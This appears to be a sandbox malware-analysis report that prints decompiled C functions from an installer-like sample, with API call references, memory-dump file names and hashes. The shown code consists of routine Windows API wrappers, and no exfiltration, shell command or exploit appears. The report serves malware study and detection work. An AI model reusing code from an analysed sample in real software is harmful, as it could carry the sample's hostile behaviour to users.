                                                                                                                          • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                          • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                                                                                          • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                          • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040620A(void* _a4, void* _a8, long _a12) {
                                                                                                                          				int _t7;
                                                                                                                          				long _t11;
                                                                                                                          
                                                                                                                          				_t11 = _a12;
                                                                                                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                          					return 0;
                                                                                                                          				} else {
                                                                                                                          					return 1;
                                                                                                                          				}
                                                                                                                          			}





                                                                                                                          0x0040620e
                                                                                                                          0x0040621e
                                                                                                                          0x00406226
                                                                                                                          0x00000000
                                                                                                                          0x0040622d
                                                                                                                          0x00000000
                                                                                                                          0x0040622f

                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00413AD5,0040CEF0,00403579,0040CEF0,00413AD5,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3934441357-0
                                                                                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                          • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                          • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004061DB(void* _a4, void* _a8, long _a12) {
                                                                                                                          				int _t7;
                                                                                                                          				long _t11;
                                                                                                                          
                                                                                                                          				_t11 = _a12;
                                                                                                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                          					return 0;
                                                                                                                          				} else {
                                                                                                                          					return 1;
                                                                                                                          				}
                                                                                                                          			}





                                                                                                                          0x004061df
                                                                                                                          0x004061ef
                                                                                                                          0x004061f7
                                                                                                                          0x00000000
                                                                                                                          0x004061fe
                                                                                                                          0x00000000
                                                                                                                          0x00406200

                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                          • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                                                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                          • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          
                                                                                                                          				 *0x71465048 = _a4;
                                                                                                                          				if(_a8 == 1) {
                                                                                                                          					VirtualProtect(0x7146505c, 4, 0x40, 0x7146504c); // executed
                                                                                                                          					 *0x7146505c = 0xc2;
                                                                                                                          					 *0x7146504c = 0;
                                                                                                                          					 *0x71465054 = 0;
                                                                                                                          					 *0x71465068 = 0;
                                                                                                                          					 *0x71465058 = 0;
                                                                                                                          					 *0x71465050 = 0;
                                                                                                                          					 *0x71465060 = 0;
                                                                                                                          					 *0x7146505e = 0;
                                                                                                                          				}
                                                                                                                          				return 1;
                                                                                                                          			}



                                                                                                                          0x71462a88
                                                                                                                          0x71462a8d
                                                                                                                          0x71462a9d
                                                                                                                          0x71462aa5
                                                                                                                          0x71462aac
                                                                                                                          0x71462ab1
                                                                                                                          0x71462ab6
                                                                                                                          0x71462abb
                                                                                                                          0x71462ac0
                                                                                                                          0x71462ac5
                                                                                                                          0x71462aca
                                                                                                                          0x71462aca
                                                                                                                          0x71462ad2

                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(7146505C,00000004,00000040,7146504C), ref: 71462A9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33069504467.0000000071461000.00000020.00000001.01000000.00000005.sdmp, Offset: 71460000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33069452109.0000000071460000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069570468.0000000071464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33069617155.0000000071466000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_71460000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          • Opcode ID: 29a780cd8d33ed222979d6b53aca431484d8e1762a61767b2cf27e38eed2515e
                                                                                                                          • Instruction ID: 0f5d7772b72d99a90721e605a5341caa65abeb1da272c571c276d90e7a8fcd6d
                                                                                                                          • Opcode Fuzzy Hash: 29a780cd8d33ed222979d6b53aca431484d8e1762a61767b2cf27e38eed2515e
                                                                                                                          • Instruction Fuzzy Hash: 59F0AEF2A0C381EEC351CF2A8644B093BF4B74A38CB24452AE588DE261E374C848CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                          				void* _t7;
                                                                                                                          				long _t8;
                                                                                                                          				void* _t9;
                                                                                                                          
                                                                                                                          				_t7 = E00406454(_a4,  &_a12);
                                                                                                                          				if(_t7 != 0) {
                                                                                                                          					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                                                          					return _t8;
                                                                                                                          				}
                                                                                                                          				_t9 = 6;
                                                                                                                          				return _t9;
                                                                                                                          			}






                                                                                                                          0x004064df
                                                                                                                          0x004064e6
                                                                                                                          0x004064f9
                                                                                                                          0x00000000
                                                                                                                          0x004064f9
                                                                                                                          0x004064ea
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                          • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                                                                          • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                          • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004015A3() {
                                                                                                                          				int _t5;
                                                                                                                          				void* _t11;
                                                                                                                          				int _t14;
                                                                                                                          
                                                                                                                          				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                                                          				_t14 = _t5;
                                                                                                                          				if(_t14 == 0) {
                                                                                                                          					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}






                                                                                                                          0x004015ae
                                                                                                                          0x004015b4
                                                                                                                          0x004015b6
                                                                                                                          0x0040292e
                                                                                                                          0x0040292e
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 5a00e4d314648be1808c87570a25157f13ca71507e042c216d6ebfaf23a301c0
                                                                                                                          • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                                                                                          • Opcode Fuzzy Hash: 5a00e4d314648be1808c87570a25157f13ca71507e042c216d6ebfaf23a301c0
                                                                                                                          • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404610(int _a4) {
                                                                                                                          				struct HWND__* _t2;
                                                                                                                          				long _t3;
                                                                                                                          
                                                                                                                          				_t2 =  *0x429238;
                                                                                                                          				if(_t2 != 0) {
                                                                                                                          					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                                                          					return _t3;
                                                                                                                          				}
                                                                                                                          				return _t2;
                                                                                                                          			}





                                                                                                                          0x00404610
                                                                                                                          0x00404617
                                                                                                                          0x00404622
                                                                                                                          0x00000000
                                                                                                                          0x00404622
                                                                                                                          0x00404628

                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                                                          • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                                                                                          • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                                                          • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004035F8(long _a4) {
                                                                                                                          				long _t2;
                                                                                                                          
                                                                                                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}




                                                                                                                          0x00403606
                                                                                                                          0x0040360c

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004045F9(int _a4) {
                                                                                                                          				long _t2;
                                                                                                                          
                                                                                                                          				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}




                                                                                                                          0x00404607
                                                                                                                          0x0040460d

                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                                                          • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                                                                          • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                                                          • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405C8E(struct _SHELLEXECUTEINFOW* _a4) {
                                                                                                                          				struct _SHELLEXECUTEINFOW* _t4;
                                                                                                                          				int _t5;
                                                                                                                          
                                                                                                                          				_t4 = _a4;
                                                                                                                          				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                                                                                                          				_t4->cbSize = 0x3c; // executed
                                                                                                                          				_t5 = ShellExecuteExW(_t4); // executed
                                                                                                                          				return _t5;
                                                                                                                          			}





                                                                                                                          0x00405c8e
                                                                                                                          0x00405c93
                                                                                                                          0x00405c97
                                                                                                                          0x00405c9d
                                                                                                                          0x00405ca3

                                                                                                                          APIs
                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00405C9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteShell
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 587946157-0
                                                                                                                          • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                                                          • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                                                                          • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                                                          • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004045E6(int _a4) {
                                                                                                                          				int _t2;
                                                                                                                          
                                                                                                                          				_t2 = EnableWindow( *0x423744, _a4); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}




                                                                                                                          0x004045f0
                                                                                                                          0x004045f6

                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2492992576-0
                                                                                                                          • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                                                          • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                                                                                          • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                                                          • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				long _v16;
                                                                                                                          				long _v20;
                                                                                                                          				long _v24;
                                                                                                                          				char _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				long _v36;
                                                                                                                          				char _v40;
                                                                                                                          				unsigned int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				WCHAR* _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				intOrPtr _v68;
                                                                                                                          				WCHAR* _v72;
                                                                                                                          				void _v76;
                                                                                                                          				struct HWND__* _v80;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr _t82;
                                                                                                                          				long _t87;
                                                                                                                          				short* _t89;
                                                                                                                          				void* _t95;
                                                                                                                          				signed int _t96;
                                                                                                                          				int _t109;
                                                                                                                          				signed short _t114;
                                                                                                                          				signed int _t118;
                                                                                                                          				struct HWND__** _t122;
                                                                                                                          				intOrPtr* _t138;
                                                                                                                          				WCHAR* _t146;
                                                                                                                          				unsigned int _t150;
                                                                                                                          				signed int _t152;
                                                                                                                          				unsigned int _t156;
                                                                                                                          				signed int _t158;
                                                                                                                          				signed int* _t159;
                                                                                                                          				signed int* _t160;
                                                                                                                          				struct HWND__* _t166;
                                                                                                                          				struct HWND__* _t167;
                                                                                                                          				int _t169;
                                                                                                                          				unsigned int _t197;
                                                                                                                          
                                                                                                                          				_t156 = __edx;
                                                                                                                          				_t82 =  *0x422720; // 0x83cdcc
                                                                                                                          				_v32 = _t82;
                                                                                                                          				_t2 = _t82 + 0x3c; // 0x0
                                                                                                                          				_t3 = _t82 + 0x38; // 0x0
                                                                                                                          				_t146 = ( *_t2 << 0xb) + 0x42b000;
                                                                                                                          				_v12 =  *_t3;
                                                                                                                          				if(_a8 == 0x40b) {
                                                                                                                          					E00405CAC(0x3fb, _t146);
                                                                                                                          					E004068EF(_t146);
                                                                                                                          				}
                                                                                                                          				_t167 = _a4;
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					L8:
                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                          						L20:
                                                                                                                          						if(_a8 == 0x40f) {
                                                                                                                          							L22:
                                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                                          							_v12 = _v12 & 0x00000000;
                                                                                                                          							E00405CAC(0x3fb, _t146);
                                                                                                                          							if(E0040603F(_t186, _t146) == 0) {
                                                                                                                          								_v8 = 1;
                                                                                                                          							}
                                                                                                                          							E00406668(0x421718, _t146);
                                                                                                                          							_t87 = E00406A35(1);
                                                                                                                          							_v16 = _t87;
                                                                                                                          							if(_t87 == 0) {
                                                                                                                          								L30:
                                                                                                                          								E00406668(0x421718, _t146);
                                                                                                                          								_t89 = E00405FE2(0x421718);
                                                                                                                          								_t158 = 0;
                                                                                                                          								if(_t89 != 0) {
                                                                                                                          									 *_t89 = 0;
                                                                                                                          								}
                                                                                                                          								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                          									goto L35;
                                                                                                                          								} else {
                                                                                                                          									_t169 = 0x400;
